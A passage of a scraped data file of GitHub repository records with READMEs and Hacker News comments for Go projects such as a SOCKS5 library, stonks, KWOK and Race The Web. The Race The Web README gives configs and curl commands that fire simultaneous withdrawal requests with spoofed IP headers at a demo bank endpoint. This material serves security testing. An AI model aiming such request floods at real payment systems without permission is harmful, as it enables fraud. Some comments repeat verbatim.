to work, but the release will not be complete. When everything is working there should be 3 assets in each release, but instead there will only be the 2 source code assets. The third asset, which is what helm actually uses, is missing. This issue will become apparent when you run `cr index` and it always claims that nothing has changed, because it can't find the asset it expects for the release.\n\nIt appears like the [go-github Do call](https://github.com/google/go-github/blob/master/github/github.go#L520) does not catch the fact that the upload URL is incorrect and pass back the expected error. If the asset upload fails, it would be better if the release was rolled back (deleted) and an appropriate log message is be displayed to the user.\n\nThe `cr index` command should also generate a warning when a release has no assets attached to it, to help people detect and troubleshoot this type of problem.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "kellegous/go", "link": "https://github.com/kellegous/go", "tags": [], "stars": 522, "description": "Another Google-like Go short link service", "lang": "Go", "repo_lang": "", "readme": "# A \"go\" short-link service\n\n## Background\nThe first time I encountered \"go\" links was at Google. Anyone on the corporate\nnetwork could register a URL shortcut and it would redirect the user to the\nappropriate page. So for instance, if you wanted to find out more about BigTable,\nyou simply directed your browser at http://go/bigtable and you would be redirected to\nsomething about the BigTable data storage system. I was later told that the\nfirst go service at Google was written by [Benjamin Staffin](https://www.linkedin.com/in/benjaminstaffin)\nto end the never-ending stream of requests for internal CNAME entries. He\ndescribed it as AOL keywords for the corporate network. These days if you go to\nany reasonably sized company, you are likely to find a similar system. Etsy made\none after seeing that Twitter had one ... it's a contagious and useful little\ntool. So contagious, in fact, that many former Googlers that I know have built\nor contributed to a similar system post-Google. I am no different, this is my\n\"go\" link service.\n\nOne slight difference between this go service and Google's is that this one is also\ncapable of generating short links for you.\n\n## Installation\nThis tool is written in Go (ironically) and can be easily installed and started\nwith the following commands.\n\n```\nGOPATH=`pwd` go install github.com/kellegous/go\nbin/go\n```\n\nBy default, the service will put all of its data in the directory `data` and will\nlisten to requests on the port `8067`. Both of these, however, are easily configured\nusing the `--data=/path/to/data` and `--addr=:80` command line flags.\n\n## DNS Setup\nTo get the most benefit from the service, you should setup a DNS entry on your\nlocal network, `go.corp.mycompany.com`. Make sure that corp.mycompany.com is in\nthe search domains for each user on the network. This is usually easily accomplished\nby configuring your DHCP server. Now, simply typing \"go\" into your browser should\ntake you to the service, where you can register shortcuts. Obviously, those\nshortcuts will also be available by typing \"go/shortcut\".\n\n## Using the Service\nOnce you have it all setup, using it is pretty straight-forward.\n\n#### Create a new shortcut\nType `go/edit/my-shortcut` and enter the URL.\n\n#### Visit a shortcut\nType `go/my-shortcut` and you'll be redirected to the URL.\n\n#### Shorten a URL\nType `go` and enter the URL.\n", "readme_type": "markdown", "hn_comments": "ArchiveTeam is extracting all the data from Google Reader and uploading it to the Internet Archive. Help out by submitting your OPML file: https://news.ycombinator.com/item?id=5958119Thanks mihaip!Worked successfully in Windows CMD for me, without using the \\bin shell script: cd C:\\mihaip-readerisdead\n set PYTHON_HOME=C:\\mihaip-readerisdead\n C:\\path-to-py27 reader_archive\\reader_archive.py --output-directory C:\\mystuff\n\nLocked up at 251K out of 253K items for me, though. Restarting... success! Looks like it might have locked up trying to start the \"Fetching comments\" section on my first try.I guess archived RSS data for me isn't terribly important since most people seem to hide the rest of their content behind a \"More\" link to get those precious ad views.Warning to other impatient users:I didn't read the instructions too well, so the half hour I spent carefully deleting gigantic/uninteresting feeds out of my subscriptions.xml file was all for naught. Because I didn't know I needed to specify the opml_file on the command line, the script just logged into my Reader account (i.e., it walked me through the browser-based authorization process) and downloaded my subscriptions from there -- including all the gigantic/uninteresting subscriptions that I did NOT care to download.So now I've gone and downloaded 2,592,159 items, consuming 13 GB of space.I'm NOT complaining -- I actually think it's AWESOME that this is possible -- but if you don't want to download millions of items, be sure to read the instructions and use the opml_file directive.If this does what I think it does(And it seems to be doing it now on my machine), then this is truly, truly awesome.Thank you. mihaip, if you are ever in Houston I will buy you a beer/ and or a steak dinner.This is excellent, thank you for making this! I'm using it right now to make an offline archive of my Reader stuff.My only gripe would be the tool's inability to continue after a partial run, but since I won't be using this more than once that's probably OK.All web services should have a handy CLI extraction tool, preferably one that can be run from a CRON call. On that note, I'm very happy with gm_vault, as well.Edit: getting a lot of XML parse errors, by the way.Thank you for this!\nNow I can procrastinate on my own reader app for much longer :)Should we be concerned with errors like this? [W 130629 03:11:54 api:254] Requested item id tag:google.com,2005:reader/item/afe90dad8acde78b (-5771066408489326709), but it was not found in the result\n\nI'm getting ~1-2 per \"Fetch N/M item bodies\" line.This is an impressive bit of work. I have had, though, an interesting thing happen, in that it's apparently trying to pull every single item from explore and from suggested items in, to the extent that I get a message saying I have 13 million items, and still going strong -- it pulled about 5 or 6 gig of data down .Is there some way to avoid all the years of explore and suggested items with reader archive? I tried limiting the maximum number of items to 10.000 but it was still running and growing after 12 hours. Interesting though, what it was able to accomplish in that time.This is an impressive bit of work. I have had, though, an interesting thing happen, in that it's apparently trying to pull every single item from explore and from suggested items in, to the extent that I get a message saying I have 13 million items, and still going strong -- it pulled about 5 or 6 gig of data down .Is there some way to avoid all the years of explore and suggested items with reader archive? I tried limiting the maximum number of items to 10.000 but it was still running and growing after 12 hours. Interesting though, what it was able to accomplish in that time.I'm getting \"ImportError: No module named site\"echo %pythonpath% gives c:\\readerisdeadI copied 'base' from the readerisdead zipfile to c:\\python27\\lib & also copied the base folder into the same folder as reader_archive.pyC:\\readerisdead\\reader_archive\\reader_archive.py --output-directory C:\\googlereader gives \"ImportError: No module named site\"What am I doing wrong? How can I get this to work?This is an impressive bit of work. I have had, though, an interesting thing happen, in that it's apparently trying to pull every single item from explore and from suggested items in, to the extent that I get a message saying I have 13 million items, and still going strong -- it pulled about 5 or 6 gig of data down .Is there some way to avoid all the years of explore and suggested items with reader archive? I tried limiting the maximum number of items to 10.000 but it was still running and growing after 12 hours. Interesting though, what it was able to accomplish in that time.This is an impressive bit of work. I have had, though, an interesting thing happen, in that it's apparently trying to pull every single item from explore and from suggested items in, to the extent that I get a message saying I have 13 million items, and still going strong -- it pulled about 5 or 6 gig of data down .Is there some way to avoid all the years of explore and suggested items with reader archive? I tried limiting the maximum number of items to 10.000 but it was still running and growing after 12 hours. Interesting though, what it was able to accomplish in that time.The title has it right. I never knew this existed, but it seems like something I've been looking for... Is it worth trying out at its current (open) state? Or is it just another failed Google Lab experiment?I smell DART in the air.\nThis won't be the last JS app they will abandon.I'm assuming this was the \"Brightly\" from that leaked Dart memo[0] some time back. Disappointing, I was a little excited to see what Google could bring to the IDE space.[0] https://gist.github.com/1208618/", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "trezor/blockbook", "link": "https://github.com/trezor/blockbook", "tags": ["bitcoin", "backend", "trezor"], "stars": 522, "description": ":blue_book: Trezor address/account balance backend ", "lang": "Go", "repo_lang": "", "readme": "[![Go Report Card](https://goreportcard.com/badge/trezor/blockbook)](https://goreportcard.com/report/trezor/blockbook)\n\n# Blockbook\n\n**Blockbook** is back-end service for Trezor wallet. Main features of **Blockbook** are:\n\n- index of addresses and address balances of the connected block chain\n- fast index search\n- simple blockchain explorer\n- websocket, API and legacy Bitcore Insight compatible socket.io interfaces\n- support of multiple coins (Bitcoin and Ethereum type) with easy extensibility to other coins\n- scripts for easy creation of debian packages for backend and blockbook\n\n## Build and installation instructions\n\nOfficially supported platform is **Debian Linux** and **AMD64** architecture.\n\nMemory and disk requirements for initial synchronization of **Bitcoin mainnet** are around 32 GB RAM and over 180 GB of disk space. After initial synchronization, fully synchronized instance uses about 10 GB RAM.\nOther coins should have lower requirements, depending on the size of their block chain. Note that fast SSD disks are highly\nrecommended.\n\nUser installation guide is [here](https://wiki.trezor.io/User_manual:Running_a_local_instance_of_Trezor_Wallet_backend_(Blockbook)).\n\nDeveloper build guide is [here](/docs/build.md).\n\nContribution guide is [here](CONTRIBUTING.md).\n\n## Implemented coins\n\nBlockbook currently supports over 30 coins. The Trezor team implemented \n\n- Bitcoin, Bitcoin Cash, Zcash, Dash, Litecoin, Bitcoin Gold, Ethereum, Ethereum Classic, Dogecoin, Namecoin, Vertcoin, DigiByte, Liquid\n\nthe rest of coins were implemented by the community.\n\nTestnets for some coins are also supported, for example:\n- Bitcoin Testnet, Bitcoin Cash Testnet, ZCash Testnet, Ethereum Testnet Ropsten\n\nList of all implemented coins is in [the registry of ports](/docs/ports.md).\n\n## Common issues when running Blockbook or implementing additional coins\n\n#### Out of memory when doing initial synchronization\n\nHow to reduce memory footprint of the initial sync: \n\n- disable rocksdb cache by parameter `-dbcache=0`, the default size is 500MB\n- run blockbook with parameter `-workers=1`. This disables bulk import mode, which caches a lot of data in memory (not in rocksdb cache). It will run about twice as slowly but especially for smaller blockchains it is no problem at all.\n\nPlease add your experience to this [issue](https://github.com/trezor/blockbook/issues/43).\n\n#### Error `internalState: database is in inconsistent state and cannot be used`\n\nBlockbook was killed during the initial import, most commonly by OOM killer. \nBy default, Blockbook performs the initial import in bulk import mode, which for performance reasons does not store all data immediately to the database. If Blockbook is killed during this phase, the database is left in an inconsistent state. \n\nSee above how to reduce the memory footprint, delete the database files and run the import again. \n\nCheck [this](https://github.com/trezor/blockbook/issues/89) or [this](https://github.com/trezor/blockbook/issues/147) issue for more info.\n\n#### Running on Ubuntu\n\n[This issue](https://github.com/trezor/blockbook/issues/45) discusses how to run Blockbook on Ubuntu. If you have some additional experience with Blockbook on Ubuntu, please add it to [this issue](https://github.com/trezor/blockbook/issues/45).\n\n#### My coin implementation is reporting parse errors when importing blockchain\n\nYour coin's block/transaction data may not be compatible with `BitcoinParser` `ParseBlock`/`ParseTx`, which is used by default. In that case, implement your coin in a similar way we used in case of [zcash](https://github.com/trezor/blockbook/tree/master/bchain/coins/zec) and some other coins. The principle is not to parse the block/transaction data in Blockbook but instead to get parsed transactions as json from the backend.\n\n## Data storage in RocksDB\n\nBlockbook stores data the key-value store RocksDB. Database format is described [here](/docs/rocksdb.md).\n\n## API\n\nBlockbook API is described [here](/docs/api.md).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "txthinking/socks5", "link": "https://github.com/txthinking/socks5", "tags": ["socks", "socks5", "socks-protocol", "proxy"], "stars": 522, "description": "SOCKS Protocol Version 5 Library in Go. Full TCP/UDP and IPv4/IPv6 support", "lang": "Go", "repo_lang": "", "readme": "## socks5\n\n[English](README.md)\n\n[![Go Report Card](https://goreportcard.com/badge/github.com/txthinking/socks5)](https://goreportcard.com/report/github.com/txthinking/socks5)\n[![GoDoc](https://godoc.org/github.com/txthinking/socks5?status.svg)](https://godoc.org/github.com/txthinking/socks5)\n\n[\ud83d\udde3 News](https://t.me/txthinking_news)\n[\ud83e\ude78 Youtube](https://www.youtube.com/txthinking)\n[\u2764\ufe0f Sponsor](https://github.com/sponsors/txthinking)\n\nSOCKS Protocol Version 5 Library.\n\n\u5b8c\u6574 TCP/UDP \u548c IPv4/IPv6 \u652f\u6301.\n\u76ee\u6807: KISS, less is more, small API, code is like the original protocol.\n\n\u2764\ufe0f A project by [txthinking.com](https://www.txthinking.com)\n\n### \u83b7\u53d6\n```\n$ go get github.com/txthinking/socks5\n```\n\n### Struct\u7684\u6982\u5ff5 \u5bf9\u6807 \u539f\u59cb\u534f\u8bae\u91cc\u7684\u6982\u5ff5\n\n* Negotiation:\n * `type NegotiationRequest struct`\n * `func NewNegotiationRequest(methods []byte)`, in client\n * `func (r *NegotiationRequest) WriteTo(w io.Writer)`, client writes to server\n * `func NewNegotiationRequestFrom(r io.Reader)`, server reads from client\n * `type NegotiationReply struct`\n * `func NewNegotiationReply(method byte)`, in server\n * `func (r *NegotiationReply) WriteTo(w io.Writer)`, server writes to client\n * `func NewNegotiationReplyFrom(r io.Reader)`, client reads from server\n* User and password negotiation:\n * `type UserPassNegotiationRequest struct`\n * `func NewUserPassNegotiationRequest(username []byte, password []byte)`, in client\n * `func (r *UserPassNegotiationRequest) WriteTo(w io.Writer)`, client writes to server\n * `func NewUserPassNegotiationRequestFrom(r io.Reader)`, server reads from client\n * `type UserPassNegotiationReply struct`\n * `func NewUserPassNegotiationReply(status byte)`, in server\n * `func (r *UserPassNegotiationReply) WriteTo(w io.Writer)`, server writes to client\n * `func NewUserPassNegotiationReplyFrom(r io.Reader)`, client reads from server\n* Request:\n * `type Request struct`\n * `func NewRequest(cmd byte, atyp byte, dstaddr []byte, dstport []byte)`, in client\n * `func (r *Request) WriteTo(w io.Writer)`, client writes to server\n * `func NewRequestFrom(r io.Reader)`, server reads from client\n * After server gets the client's *Request, processes...\n* Reply:\n * `type Reply struct`\n * `func NewReply(rep byte, atyp byte, bndaddr []byte, bndport []byte)`, in server\n * `func (r *Reply) WriteTo(w io.Writer)`, server writes to client\n * `func NewReplyFrom(r io.Reader)`, client reads from server\n* Datagram:\n * `type Datagram struct`\n * `func NewDatagram(atyp byte, dstaddr []byte, dstport []byte, data []byte)`\n * `func NewDatagramFromBytes(bb []byte)`\n * `func (d *Datagram) Bytes()`\n\n### \u9ad8\u7ea7 API\n\n> \u8fd9\u53ef\u4ee5\u6ee1\u8db3\u7ecf\u5178\u573a\u666f\uff0c\u7279\u6b8a\u573a\u666f\u63a8\u8350\u4f60\u9009\u62e9\u4e0a\u9762\u7684\u5c0fAPI\u6765\u81ea\u5b9a\u4e49\u3002\n\n**Server**: \u652f\u6301UDP\u548cTCP\n\n* `type Server struct`\n* `type Handler interface`\n * `TCPHandle(*Server, *net.TCPConn, *Request) error`\n * `UDPHandle(*Server, *net.UDPAddr, *Datagram) error`\n\n\u4e3e\u4f8b:\n\n```\nserver, _ := NewClassicServer(addr, ip, username, password, tcpTimeout, udpTimeout)\nserver.ListenAndServe(Handler)\n```\n\n**Client**: \u652f\u6301TCP\u548cUDP, \u8fd4\u56denet.Conn\n\n* `type Client struct`\n\n\u4e3e\u4f8b:\n\n```\nclient, _ := socks5.NewClient(server, username, password, tcpTimeout, udpTimeout)\nconn, _ := client.Dial(network, addr)\n```\n\n\n### \u8c01\u5728\u4f7f\u7528\u6b64\u9879\u76ee\n\n- Brook: https://github.com/txthinking/brook\n- Shiliew: https://www.txthinking.com/shiliew.html\n- dismap: https://github.com/zhzyker/dismap\n- emp3r0r: https://github.com/jm33-m0/emp3r0r\n- hysteria: https://github.com/apernet/hysteria\n- mtg: https://github.com/9seconds/mtg\n- trojan-go: https://github.com/p4gefau1t/trojan-go\n\n## \u5f00\u6e90\u534f\u8bae\n\n\u57fa\u4e8e MIT \u534f\u8bae\u5f00\u6e90\n", "readme_type": "markdown", "hn_comments": "Next time someone says to me that language's popularity doesn't matter for it's utility, I'll remember how Go's socks library appears on the front page of HN, while my pull request the Haskell's socks library (which implements the most basic feature that author added to the top of TODO list himself) is sitting unmerged and uncommented now for almost a year.(1) (If I sound bitter it's because I am.)Seriously though, such \"boring\" libraries that you just need in your toolbox are a great way to evaluate the health of the whole ecosystem.[1][https://github.com/vincenthz/hs-socks/pull/24]If I only want the client side, does this add anything over https://godoc.org/golang.org/x/net/proxy ?Honest question: What do people use Socks for? Personally I haven\u2019t used it since Firesheep...Last time I needed a SOCKS5 server + client in Go, I remember using github.com/getlantern/go-socks5. What does this offer above that?I will always say this was a complete hack to a specific time in history. Having SOCKS in your toolbelt of tricks is always handy and can make hard things surprisingly easy.Last time was I needed to tunnel a request from my development environment into a production VPN to contact a service which had IP access restrictions.On Firefox, your footer is very difficult to read. The font is too light on the background. Hope it is not intentional.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ericm/stonks", "link": "https://github.com/ericm/stonks", "tags": ["stock-market", "stock-data", "stocks", "stock-cli", "cli", "stock-market-data", "terminal-graphics", "go", "golang", "linux", "macos", "graphs", "tracker", "aur", "stock-visualizer", "wtfutil", "curl", "ascii-art", "terminal-based", "hacktoberfest"], "stars": 522, "description": "Stonks is a terminal based stock visualizer and tracker that displays realtime stocks in graph format in a terminal. See how fast your stonks will crash.", "lang": "Go", "repo_lang": "", "readme": "# ![Stonks](./assets/stonks.svg?raw=true)\n\n[![GitHub](https://img.shields.io/github/license/ericm/stonks?style=for-the-badge)](https://github.com/ericm/stonks/blob/master/LICENSE)\n[![GitHub contributors](https://img.shields.io/github/contributors/ericm/stonks?style=for-the-badge)](https://github.com/ericm/stonks/graphs/contributors)\n[![GitHub last commit](https://img.shields.io/github/last-commit/ericm/stonks?style=for-the-badge)](https://github.com/ericm/stonks/commits/master)\n[![GitHub release (latest by date)](https://img.shields.io/github/v/release/ericm/stonks?style=for-the-badge)](https://github.com/ericm/stonks/releases)\n[![AUR version](https://img.shields.io/aur/version/stonks?style=for-the-badge)](https://aur.archlinux.org/packages/stonks/)\n\nStonks is a terminal based stock visualizer and tracker.\n\n## Installation\n\nRequirements: golang >= 1.13\n\n### Manual\n\n1. Clone the repo\n2. Run `make && make install`\n\n### Packages\n\nStonks is available on:\n\n- [The AUR](https://aur.archlinux.org/packages/stonks/). You can install it on arch linux with my other project [yup](https://github.com/ericm/yup): `$ yup -S stonks`\n\n- HomeBrew: `brew install ericm/stonks/stonks`\n\n### Binaries\n\nBinaries are now available for Windows, MacOSX and Linux under each [release](https://github.com/ericm/stonks/releases)\n\n## [Online installationless usage (via curl)](http://stonks.icu)\n\nYou can now access basic stock graphs for passed stock tickers via the stonks HTTPS client (https://stonks.icu).\n\nTry it:\n```\n$ curl -L stonks.icu/amd/ba\n```\n\n## Usage\n\nIt uses Yahoo Finance as a backend so use the ticker format as seen on their website.\n\n```\nDisplays realtime stocks in graph format in a terminal\n\nUsage:\n stonks [flags]\n\nFlags:\n -d, --days int 24 hour period of stocks from X of days ago.\n -e, --extra Include extra pre + post time. (Only works for day)\n -h, --help help for stonks\n -i, --interval string stonks -i X[m|h] (eg 15m, 5m, 1h, 1d) (default \"15m\")\n -n, --name string Optional name for a stonk save\n -r, --remove string Remove an item from favourites\n -s, --save string Add an item to the default stonks command. (Eg: -s AMD -n \"Advanced Micro Devices\")\n -t, --theme string Display theme for the chart (Options: \"line\", \"dot\", \"icon\")\n -v, --version stonks version\n -w, --week Display the last week (will set interval to 1d)\n -y, --year Display the last year (will set interval to 5d)\n --ytd Display the year to date (will set interval to 5d)\n```\n\n### `$ stonks`\n\nGives graphs and current value/change of _saved_ stocks.\n![Stonks](./assets/1.png)\n\n### `$ stonks -s AMD -n \"Advanced Micro Devices\"`\n\nAdd a favourite stock to be tracked with `$ stonks`\n\n### `$ stonks -r AMD`\n\nRemove a favourite stock\n\n### `$ stonks AMD`\n\nGives the current stock for each ticker passed that day\n\n![Stonks](./assets/2.png)\n\n### `$ stonks -w AMD`\n\nGives the current stock for each ticker passed _for the past week_\n\n![Stonks](./assets/3.png)\n\n### `$ stonks -d 4 AMD`\n\nGives the current stock for each ticker passed X days ago\n\n![Stonks](./assets/4.png)\n\n## Configuration\n\nThe config file is located at `~/.config/stonks.yml`\n\nYou can change the following options:\n\n```yml\nconfig:\n default_theme: 0 # 0: Line, 1: Dots, 2: Icons\n favourites_height: 12 # Height of the chart in each info panel\n standalone_height: 12\n```\n\n## Usage with wtfutil\n\nYou can use a program such as [wtfutil](https://wtfutil.com/) (On Arch Linux: `yup -S wtfutil`) to make stonks refresh automatically.\nSee the sample `~/.config/wtf/config.yml` provided by [Gideon Wolfe\n](https://github.com/GideonWolfe):\n\n```yml\nwtf:\n colors:\n background: black\n border:\n focusable: darkslateblue\n focused: blue\n normal: gray\n checked: yellow\n highlight:\n fore: black\n back: gray\n rows:\n even: yellow\n odd: white\n grid:\n # How _wide_ the columns are, in terminal characters. In this case we have\n # four columns, each of which are 35 characters wide.\n columns: [33, 33, 33]\n # How _high_ the rows are, in terminal lines. In this case we have four rows\n # that support ten line of text and one of four.\n rows: [20, 20, 20, 20, 20, 20, 20, 20]\n refreshInterval: 1\n\n mods:\n tech:\n type: cmdrunner\n args: [\"tsla\", \"intc\", \"--theme\", \"dot\"]\n cmd: \"stonks\"\n enabled: true\n position:\n top: 0\n left: 0\n height: 2\n width: 3\n refreshInterval: 10\n title: \"\ud83e\udd16 Tech\"\n financial:\n type: cmdrunner\n args: [\"jpm\", \"v\", \"--theme\", \"dot\"]\n cmd: \"stonks\"\n enabled: true\n position:\n top: 2\n left: 0\n height: 2\n width: 3\n refreshInterval: 10\n```\n", "readme_type": "markdown", "hn_comments": "?? Seems locked from read as well> You need permission; Want in? Ask for access, or switch to an account with permission.It was changed to a read only link, not sure why. I'd have appreciated addition from the HN folksLeverage should be a column as many companies that are highly levered will not have the resources to outlast this crisis.Interesting sheet.Might be useful to also add columns to show the current PE and also the market vs book value.Actual remarks by Boston Fed's Rosengren here:https://www.bostonfed.org/news-and-events/speeches/2019/asse...", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "emicklei/proto", "link": "https://github.com/emicklei/proto", "tags": ["protobuf", "parser", "proto3", "formatter", "proto2", "golang-package", "protocol-buffers", "protobuf-parser"], "stars": 522, "description": "parser for Google ProtocolBuffers definition", "lang": "Go", "repo_lang": "", "readme": "# proto\n\n[![Build Status](https://api.travis-ci.com/emicklei/proto.svg?branch=master)](https://travis-ci.com/github/emicklei/proto)\n[![Go Report Card](https://goreportcard.com/badge/github.com/emicklei/proto)](https://goreportcard.com/report/github.com/emicklei/proto)\n[![GoDoc](https://pkg.go.dev/badge/github.com/emicklei/proto)](https://pkg.go.dev/github.com/emicklei/proto)\n[![codecov](https://codecov.io/gh/emicklei/proto/branch/master/graph/badge.svg)](https://codecov.io/gh/emicklei/proto)\n\nPackage in Go for parsing Google Protocol Buffers [.proto files version 2 + 3](https://developers.google.com/protocol-buffers/docs/reference/proto3-spec)\n\n### install\n\n go get -u -v github.com/emicklei/proto\n\n### usage\n\n\tpackage main\n\n\timport (\n\t\t\"fmt\"\n\t\t\"os\"\n\n\t\t\"github.com/emicklei/proto\"\n\t)\n\n\tfunc main() {\n\t\treader, _ := os.Open(\"test.proto\")\n\t\tdefer reader.Close()\n\n\t\tparser := proto.NewParser(reader)\n\t\tdefinition, _ := parser.Parse()\n\n\t\tproto.Walk(definition,\n\t\t\tproto.WithService(handleService),\n\t\t\tproto.WithMessage(handleMessage))\n\t}\n\n\tfunc handleService(s *proto.Service) {\n\t\tfmt.Println(s.Name)\n\t}\n\n\tfunc handleMessage(m *proto.Message) {\n\t\tlister := new(optionLister)\n\t\tfor _, each := range m.Elements {\n\t\t\teach.Accept(lister)\n\t\t}\n\t\tfmt.Println(m.Name)\n\t}\n\n\ttype optionLister struct {\n\t\tproto.NoopVisitor\n\t}\n\n\tfunc (l optionLister) VisitOption(o *proto.Option) {\n\t\tfmt.Println(o.Name)\n\t}\n\n### validation\n\nCurrent parser implementation is not completely validating `.proto` definitions.\nIn many but not all cases, the parser will report syntax errors when reading unexpected charaters or tokens.\nUse some linting tools (e.g. https://github.com/uber/prototool) or `protoc` for full validation.\n\n### contributions\n\nSee [proto-contrib](https://github.com/emicklei/proto-contrib) for other contributions on top of this package such as protofmt, proto2xsd and proto2gql.\n[protobuf2map](https://github.com/emicklei/protobuf2map) is a small package for inspecting serialized protobuf messages using its `.proto` definition.\n\n\u00a9 2017-2022, [ernestmicklei.com](http://ernestmicklei.com). MIT License. Contributions welcome.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "kubernetes-sigs/kwok", "link": "https://github.com/kubernetes-sigs/kwok", "tags": ["k8s-sig-scheduling", "kubernetes", "simulator", "docker", "golang", "mulit-cluster", "nerdctl"], "stars": 523, "description": "Kubernetes WithOut Kubelet - Simulates thousands of Nodes and Clusters.", "lang": "Go", "repo_lang": "", "readme": "# `KWOK` (`K`ubernetes `W`ith`O`ut `K`ubelet)\n\n\n\n[KWOK] is a toolkit that enables setting up a cluster of thousands of Nodes in seconds.\nUnder the scene, all Nodes are simulated to behave like real ones, so the overall approach employs\na pretty low resource footprint that you can easily play around on your laptop.\n\nSo far we provide two tools:\n\n- **kwok:** Core of this repo. It simulates thousands of fake Nodes.\n- **kwokctl:** A CLI to facilitate creating and managing clusters simulated by Kwok.\n\nPlease see [our website] for more in-depth information.\n\n\n\n## Community\n\nSee our own [contributor guide] and the Kubernetes [community page].\n\n### Code of conduct\n\nParticipation in the Kubernetes community is governed by the [Kubernetes Code of Conduct][code of conduct].\n\n[KWOK]: https://sigs.k8s.io/kwok\n[our website]: https://kwok.sigs.k8s.io\n[community page]: https://kubernetes.io/community/\n[contributor guide]: https://kwok.sigs.k8s.io/docs/contributing/getting-started\n[code of conduct]: https://github.com/kubernetes-sigs/kwok/blob/main/code-of-conduct.md\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "TheHackerDev/race-the-web", "link": "https://github.com/TheHackerDev/race-the-web", "tags": ["security-tools", "race-conditions", "security", "appsec", "devops-tools", "infosec"], "stars": 521, "description": "Tests for race conditions in web applications. Includes a RESTful API to integrate into a continuous integration pipeline.", "lang": "Go", "repo_lang": "", "readme": "[![Go Report Card](https://goreportcard.com/badge/github.com/aaronhnatiw/race-the-web)](https://goreportcard.com/report/github.com/aaronhnatiw/race-the-web) [![Build Status](https://travis-ci.org/aaronhnatiw/race-the-web.svg?branch=master)](https://travis-ci.org/aaronhnatiw/race-the-web)\n\n# Race The Web (RTW)\n\nTests for race conditions in web applications by sending out a user-specified number of requests to a target URL (or URLs) *simultaneously*, and then compares the responses from the server for uniqueness. Includes a number of configuration options.\n\n## UPDATE: Now CI Compatible!\n\nVersion 2.0.0 now makes it easier than ever to integrate RTW into your continuous integration pipeline (\u00e0 la [Jenkins](https://jenkins.io/), [Travis](https://travis-ci.org/), or [Drone](https://github.com/drone/drone)), through the use of an easy to use HTTP API. More information can be found in the **Usage** section below.\n\n## Watch The Talk\n\n[![Racing the Web - Hackfest 2016](https://img.youtube.com/vi/4T99v957I0o/0.jpg)](https://www.youtube.com/watch?v=4T99v957I0o)\n\n_Racing the Web - Hackfest 2016_\n\nSlides: https://www.slideshare.net/AaronHnatiw/racing-the-web-hackfest-2016\n\n## Usage\n\nWith configuration file\n\n```sh\n$ race-the-web config.toml\n```\n\nAPI\n\n```sh\n$ race-the-web\n```\n\n### Configuration File\n\n**Example configuration file included (_config.toml_):**\n\n```toml\n# Sample Configurations\n\n# Send 100 requests to each target\ncount = 100\n# Enable verbose logging\nverbose = true\n# Use an http proxy for all connections\nproxy = \"http://127.0.0.1:8080\"\n\n# Specify the first request\n[[requests]]\n # Use the GET request method\n method = \"GET\"\n # Set the URL target. Any valid URL is accepted, including ports, https, and parameters.\n url = \"https://example.com/pay?val=1000\"\n # Set the request body.\n # body = \"body=text\"\n # Set the cookie values to send with the request to this target. Must be an array.\n cookies = [\"PHPSESSIONID=12345\",\"JSESSIONID=67890\"]\n # Set custom headers to send with the request to this target. Must be an array.\n headers = [\"X-Originating-IP: 127.0.0.1\", \"X-Remote-IP: 127.0.0.1\"]\n # Follow redirects\n redirects = true\n\n# Specify the second request\n[[requests]]\n # Use the POST request method\n method = \"POST\"\n # Set the URL target. Any valid URL is accepted, including ports, https, and parameters.\n url = \"https://example.com/pay\"\n # Set the request body.\n body = \"val=1000\"\n # Set the cookie values to send with the request to this target. Must be an array.\n cookies = [\"PHPSESSIONID=ABCDE\",\"JSESSIONID=FGHIJ\"]\n # Set custom headers to send with the request to this target. Must be an array.\n headers = [\"X-Originating-IP: 127.0.0.1\", \"X-Remote-IP: 127.0.0.1\"]\n # Do not follow redirects\n redirects = false\n```\n\nTOML Spec: https://github.com/toml-lang/toml\n\n### API\n\nSince version 2.0.0, RTW now has a full-featured API, which allows you to easily integrate it into your continuous integration (CI) tool of choice. This means that you can quickly and easily test your web application for race conditions automatically whenever you commit your code.\n\nThe API works through a simple set of HTTP calls. You provide input in the form of JSON and receive a response in JSON. The 3 API endpoints are as follows:\n\n- `POST` `http://127.0.0.1:8000/set/config`: Provide configuration data (in JSON format) for the race condition test you want to run (examples below).\n- `GET` `http://127.0.0.1:8000/get/config`: Fetch the current configuration data. Data is returned in a JSON response.\n- `POST` `http://127.0.0.1:8000/start`: Begin the race condition test using the configuration that you have already provided. All findings are returned back in JSON output.\n\n#### Example JSON configuration (sent to `/set/config` using a `POST` request)\n\n```json\n{\n \"count\": 100,\n \"verbose\": false,\n \"requests\": [\n {\n \"method\": \"POST\",\n \"url\": \"http://racetheweb.io/bank/withdraw\",\n \"cookies\": [\n \"sessionId=dutwJx8kyyfXkt9tZbboT150TjZoFuEZGRy8Mtfpfe7g7UTPybCZX6lgdRkeOjQA\"\n ],\n \"body\": \"amount=1\",\n \"redirects\": true\n }\n ]\n}\n```\n\n#### Example workflow using curl\n\n\n1. Send the configuration data\n\n```sh\n$ curl -d '{\"count\":100,\"verbose\":false,\"requests\":[{\"method\":\"POST\",\"url\":\"http://racetheweb.io/bank/withdraw\",\"cookies\":[\"sessionId=Ay2jnxL2TvMnBD2ZF-5bXTXFEldIIBCpcS4FLB-5xjEbDaVnLbf0pPME8DIuNa7-\"],\"body\":\"amount=1\",\"redirects\":true}]}' -H \"Content-Type: application/json\" -X POST http://127.0.0.1:8000/set/config\n\n{\"message\":\"configuration saved\"}\n```\n\n2. Retrieve the configuration data for validation\n\n```sh\n$ curl -X GET http://127.0.0.1:8000/get/config\n\n{\"count\":100,\"verbose\":false,\"proxy\":\"\",\"requests\":[{\"method\":\"POST\",\"url\":\"http://racetheweb.io/bank/withdraw\",\"body\":\"amount=1\",\"cookies\":[\"sessionId=Ay2jnxL2TvMnBD2ZF-5bXTXFEldIIBCpcS4FLB-5xjEbDaVnLbf0pPME8DIuNa7-\"],\"headers\":null,\"redirects\":true}]}\n```\n\n3. Start the race condition test\n\n```sh\n$ curl -X POST http://127.0.0.1:8000/start\n```\n\nResponse (expanded for 